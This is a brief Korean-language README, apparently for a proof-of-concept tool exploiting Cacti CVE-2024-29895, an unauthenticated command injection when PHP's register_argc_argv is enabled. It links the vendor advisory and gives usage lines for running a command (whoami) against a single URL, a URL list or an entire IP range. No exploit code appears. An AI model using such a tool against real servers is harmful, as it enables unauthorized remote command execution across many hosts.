
Cacti CVE-2024-29895 POC
Cacti CVE-2024-29895 POC PHP의 register_argc_argv 옵션이 On인 경우, 명령 주입 취약점으로 인해 인증되지 않은 모든 사용자가 서버에서 임의의 명령을 실행할 수 있습니다.
https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
사용법: app -m http://site.com/ -c whoami
또는: app -w url_list.txt -c whoami
또는: app -r 192.168.1.0/24 -c whoami